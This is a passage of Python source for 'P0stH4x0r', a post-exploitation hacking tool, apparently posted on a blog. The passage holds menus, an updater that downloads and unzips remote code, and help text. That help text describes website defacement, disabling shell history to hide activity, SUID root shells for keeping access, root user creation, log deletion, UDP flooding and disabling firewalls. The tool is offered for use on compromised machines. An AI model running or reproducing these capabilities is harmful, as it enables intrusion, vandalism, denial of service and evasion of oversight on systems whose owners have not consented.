coice=raw_input(bcolors.RED + "\nYour Choice: " + bcolors.END) | |
print(bcolors.PURPLE + "\nTo Install new Packages, you Need to Have Root Priviliges!\n" + bcolors.END) | |
if coice == '1': | |
print(bcolors.PURPLE + "Attempting to Install Netcat..." + bcolors.END) | |
time.sleep(1) | |
os.system(installcmd + "netcat6") | |
print(bcolors.RED + "Done!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
elif coice == '2': | |
print(bcolors.PURPLE + "Attempting to Install Hashcat..." + bcolors.END) | |
time.sleep(1) | |
os.system(installcmd + "hashcat") | |
print(bcolors.RED + "Done!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
elif coice == '3': | |
print(bcolors.PURPLE + "Attempting to Install NMap..." + bcolors.END) | |
time.sleep(1) | |
os.system(installcmd + "nmap") | |
print(bcolors.RED + "Done!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
elif coice == '4': | |
print(bcolors.PURPLE + "Attempting to Install Lynx..." + bcolors.END) | |
time.sleep(1) | |
os.system(installcmd + "lynx") | |
print(bcolors.RED + "Done!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
elif coice == '5': | |
print(bcolors.BLUE + "Enter the Package that you want to install:" + bcolors.END) | |
pacman=raw_input() | |
if len(pacman) > 0: | |
print(bcolors.PURPLE + "Attempting to Install " + pacman + "..." + bcolors.END) | |
time.sleep(1) | |
os.system(installcmd + pacman) | |
print(bcolors.RED + "Done!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
else: | |
print(bcolors.ORANGE + "Nothing Entered! Returning Back..." + bcolors.END) | |
time.sleep(1) | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
def pinstmenu(): | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Downloads]\n" + bcolors.END) | |
#### ##### #### | |
print(bcolors.GREEN + "\nChoose:\n 1. Package Installer\n 2. Post-Exploitation Script Downloader\n 3. Exit" + bcolors.END) | |
c=raw_input(bcolors.RED + "\n\nYour Choice: " + bcolors.END) | |
if c == '1': | |
pinstallous() | |
elif c == '2': | |
postinstallous() | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
## Update Script | |
def updater(): | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print("\n") | |
##### ##### ##### | |
print(bcolors.BLUE + "\n Current Version: " + version + "\n" + bcolors.END) | |
print(bcolors.ORANGE + "Checking if a New Version is Available!" + bcolors.END) | |
request="" | |
try: | |
try: | |
request=urllib2.urlopen("http://p0sth4x0r.net46.net/download/update/version.html").read().split('-')[0] | |
except: | |
request=urllib2.urlopen("http://p0sth4x0r.net46.net/download/update/version.html").read() | |
time.sleep(1) | |
if version == request: | |
print(bcolors.GREEN + "\n************************************************************\n\n P0stH4x0r is Up to Date!\n\n************************************************************\n" + bcolors.END) | |
time.sleep(3) | |
raw_input(bcolors.ORANGE + "\n\n -- HIT <ENTER> TO CONTINUE... -- " + bcolors.END) | |
time.sleep(1) | |
else: | |
print(bcolors.RED + "\n************************************************************\n\n P0stH4x0r Update Available!\n\n************************************************************\n" + bcolors.END) | |
print(bcolors.BLUE + "\n New Update: " + request[0:5] + "\n" + bcolors.END) | |
try: | |
print(bcolors.BLUE + "\n\n >> WHAT IS NEW <<\n") | |
whatisnew=urllib2.urlopen('http://www.p0sth4x0r.net46.net/download/update/whatisnew.html').read() | |
whatisnew=whatisnew.split('<!-- Hosting24 Analytics Code -->')[0] | |
print(whatisnew) | |
print(bcolors.END) | |
except: | |
pass | |
upd=raw_input(bcolors.ORANGE + "\n\n --> Download Update? Y/n " + bcolors.END) | |
if upd == 'y' or upd == 'Y': | |
os.system("mkdir P0stH4x0r") | |
print(bcolors.GREEN + "\n\n *** Downloading Update... *** \n\n" + bcolors.END) | |
os.system("wget http://www.p0sth4x0r.net46.net/download/files/P0stH4x0r.zip -O P0stH4x0r/P0stH4x0r_Update.zip") | |
print(bcolors.RED + "\n\n *** Download Completed! Now Extracting! ***\n\n" + bcolors.END) | |
os.system("unzip -x P0stH4x0r/P0stH4x0r_Update.zip") | |
print(bcolors.RED + "\n\n *** Extracting Completed! *** \n\n" + bcolors.END) | |
print(bcolors.GREEN + "\n\n ************************************\n\n ") | |
print(bcolors.GREEN + '\n You can Now Quit P0stH4x0r and open the Updated version!\n') | |
print(bcolors.GREEN + "\n\n ************************************\n\n ") | |
os.system("rm -r P0stH4x0r/") | |
time.sleep(3) | |
raw_input(bcolors.ORANGE + "\n\n -- HIT <ENTER> TO CONTINUE... -- " + bcolors.END) | |
time.sleep(1) | |
else: | |
print(bcolors.RED + "\n\n *** ABORTED! *** \n\n" + bcolors.END) | |
time.sleep(2) | |
except: | |
print(bcolors.RED + "Check your Internet Connection!\n" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
## About Function | |
def about(): | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print("\n") | |
##### ##### ##### | |
print(bcolors.PURPLE + "[About]" + bcolors.END) | |
print(bcolors.GREEN) | |
time.sleep(1) | |
print("\n ***************** \n") | |
time.sleep(1) | |
print("- Developer: Akatzbreaker -") | |
time.sleep(1) | |
print("- Blog: gnahackteam.wordpress.com -") | |
time.sleep(1) | |
print("- Twitter: @akatzbreaker -") | |
time.sleep(1) | |
print("- P0stH4x0r: p0sth4x0r.net46.net -") | |
time.sleep(1) | |
print("- Credits: joomlafkr (Th3Br3acher) -") | |
time.sleep(1) | |
print("- Max00355 (Beta Tester) -") | |
time.sleep(1) | |
print("- Georgekok97 (Beta Tester)-") | |
time.sleep(1) | |
print("- creepycreeper (Coding) -") | |
time.sleep(1) | |
print("\n ***************** \n") | |
print(bcolors.END) | |
time.sleep(1) | |
raw_input(bcolors.ORANGE + "\n\n -- HIT <ENTER> TO CONTINUE... -- " + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
## Help Menu | |
def help(): | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print("\n") | |
##### ##### ##### | |
print(bcolors.PURPLE + "[Help]" + bcolors.END) | |
print(bcolors.GREEN) | |
print("\n\n") | |
print(" 1. What are the P0stH4x0r Commands?") | |
print(" 2. Permissions") | |
print(" 3. Paths on Unix") | |
print(' 4. What "Shell Creator" Does? (SUID Shell)') | |
print(" 5. Help on Defacer") | |
print(' 6. How to "Unghost" a Machine?') | |
print(" 7. Exit") | |
print("\n") | |
helper=raw_input(bcolors.RED + "Your Choice: " + bcolors.END) | |
print(bcolors.RED + "_______________________________________________________________" + bcolors.END) | |
if helper == '1': | |
print(bcolors.BLUE) | |
print(" -- These are the Commands that you should type to use P0stH4x0r Functions -- \n\n") | |
print(" COMMAND FUNCTION INITIALISED\n") | |
print(" defacer Defacer") | |
print(' hideme "Hide Me" Menu Opened') | |
print(" ghost Disable .bash_history Logging for P0stH4x0r (Enabled by Default)") | |
print(" unghost Disable <GHOST> Mode") | |
print(" sshhandler SSH Connection Handler") | |
print(" createroot Root Creation Helper") | |
print(" suidshell SUID Shell Creator") | |
print(" se Social-Engineering") | |
print(" privesc Privilige Escalation Checker Script") | |
print(" findsuid SUID File Finder") | |
print(" udpflood UDP Packet Flooder") | |
print(" dis_firewall Firewall Disabler") | |
print(" whatinstaller Find the Package Installer of the Machine") | |
print(" packageinstall Install/Download Packages and Post-Exploitation Scripts") | |
print(" psupdate Update P0stH4x0r") | |
print(" about Show the About Dialog") | |
print(" help Show the Help Dialog") | |
print(" artwork Show an Ascii Artwork") | |
print(" exit Exit P0stH4x0r") | |
elif helper == '2': | |
print(bcolors.BLUE) | |
print("\n\nTo complete some functions that are available in P0stH4x0r require either Root Priviliges or Writing to /bin Priviliges.") | |
print("\n\n") | |
print("-- SPECIFICALLY --\n") | |
print("-Defacer :: ROOT MIGHT BE REQUIRED") | |
print("-Log Randomisation :: ROOT IS RECOMMENDED, BUT IT IS OPTIONAL") | |
print("-Log Deletion :: ROOT REQUIRED") | |
print("-Bash_History (EDIT/DELETE) :: NO ROOT REQUIRED") | |
print("-SSH Handler (START/STOP) :: NO ROOT REQUIRED") | |
print("-OpenSSH Install :: ROOT REQUIRED") | |
print("-Root User Creator :: ROOT REQUIRED") | |
print("-Social-Engineering Functions :: WRITE TO /bin REQUIRED") | |
print("-Privilege-Escalation-Checker :: NO ROOT REQUIRED") | |
print("-SUID File Finder :: ROOT IS RECOMMENDED, BUT IT IS OPTIONAL") | |
print("-UDP Packet Flooder :: NO ROOT REQUIRED") | |
print("-Default Firewall Disabler :: ROOT REQUIRED") | |
print("-Package Downloader :: ROOT MIGHT BE REQUIRED") | |
print("-In-Script Updater :: NO ROOT REQUIRED") | |
print(bcolors.END) | |
raw_input(bcolors.ORANGE + "\n\nHit <ENTER> to Continue..." + bcolors.END) | |
os.system("clear") | |
elif helper == '3': | |
print(bcolors.BLUE) | |
print("\n\nSome Functions Need you to Enter some Paths. Here are how to access the Paths in Unix-Based Systems:") | |
print("\n\n") | |
print("-- SPECIFICALLY --\n") | |
print("-File in Current Directory :: file.ext") | |
print("-File at the Previous Directory/Up :: ../file.ext") | |
print("-File at the ROOT Directory :: /file.ext") | |
print("-File at the Desktop of a user :: /home/username/Desktop/file.ext") | |
print('\n At these Examples, the file is named "file" and the extension is "ext". ALL THE PATHS NEED THE FILE NAME AND THE EXTENSION!') | |
print(bcolors.END) | |
raw_input(bcolors.ORANGE + "\n\nHit <ENTER> to Continue..." + bcolors.END) | |
os.system("clear") | |
elif helper == '4': | |
print(bcolors.BLUE) | |
print("\n\nHere is some Help for the 'Shell Creation' Option:") | |
print('\n\n') | |
print("-- WHAT THIS FUNCTION DOES --") | |
print("\nLet's say you have Root Priviliges. You don't want to create a New user. You can then use this option so as to create a new shell!\n This Shell can be executed by ANY User (even non-Roots), and do administrative tasks (Like... ANYTHING!).\nSo, every time you reconnect as a normal user, execute this new Shell, and you will gain your previous permissions!") | |
print("\nIf you are NOT a Root, the Shell will 'inherit' your CURRENT Priviliges!") | |
print(bcolors.END) | |
raw_input(bcolors.ORANGE + "\n\nHit <ENTER> to Continue..." + bcolors.END) | |
os.system("clear") | |
elif helper == '5': | |
print(bcolors.BLUE) | |
print("\n\nDefacer Help:") | |
print("\n\n") | |
print("-- TIPS AND HELP --\n") | |
print("-You must enter ONLY THE NAME of the Website (ex. web1.com).\n NOT THE PATH (ex. /var/www/web1.com)\n") | |
print("-You can Enter more than One Websites. Just separate with a comma (,). EXAMPLE: web1.com,web2.com,web3.com\n *** DON'T USE SPACES, IF YOU SELECT MORE THAN ONE WEBSITES! ***\n") | |
print("-Select ALL Websites by entering an Asterisk (*)") | |
print("-If the Inputted time is 0, the Website(s) Entered will be Defaced when Apply is Executed.") | |
print("-You must enter the date/time in UTC Format! | Current UTC Format:") | |
os.system("date -u") | |
print("\n-Writing Priviliges to /var/www might need!") | |
print("\n\n -- NOTE: Sometimes when you apply the Deface, an error might occur. Try again! It may need two times to try... (You don't need to reenter the data).") | |
print(bcolors.END) | |
raw_input(bcolors.ORANGE + "\n\nHit <ENTER> to Continue..." + bcolors.END) | |
os.system("clear") | |
elif helper == '6': | |
print(bcolors.BLUE) | |
print(' === To "Unghost" a System follow these Steps == ') | |
print("\n 1) Type at the Terminal: ") | |
print(" nano ~/.bashrc") | |
print("\n 2) Find the line that says: ") | |
print(" HISTCONTROL=ignorespace") | |
print("\n 3) Delete that line! Now CTRL+X to Save and Exit...") | |
print(" 4) That's it!") | |
raw_input(bcolors.ORANGE + "\n\nHit <ENTER> to Continue..." + bcolors.END) | |
os.system("clear") | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
main() | |
######################################################## | |
# Thank you for using P0stH4x0r # | |
######################################################## | |
# # | |
# Developer: Akatzbreaker # | |
# Blog: gnahackteam.wordpress.com # | |
# Web: p0sth4x0r.net46.net # | |
# Twitter: @akatzbreaker # | |
# # | |
######################################################## | |
# # | |
# SPECIAL THANKS TO: Joomlafkr (aka Th3Br3acher) # | |
# # | |
# for the Privilige Escalation Script! # | |
# # | |
# And Max00355 and Georgekok97 for Beta Testing # | |
# and Help to Coding! # | |
# Also thanks creepycreeper for the Help on Coding # | |
# Script to support other Unix Distros too! # | |
# # | |
######################################################## | |
P0stH4x0r Website: http://www.p0sth4x0r.net46.net
No comments:
Post a Comment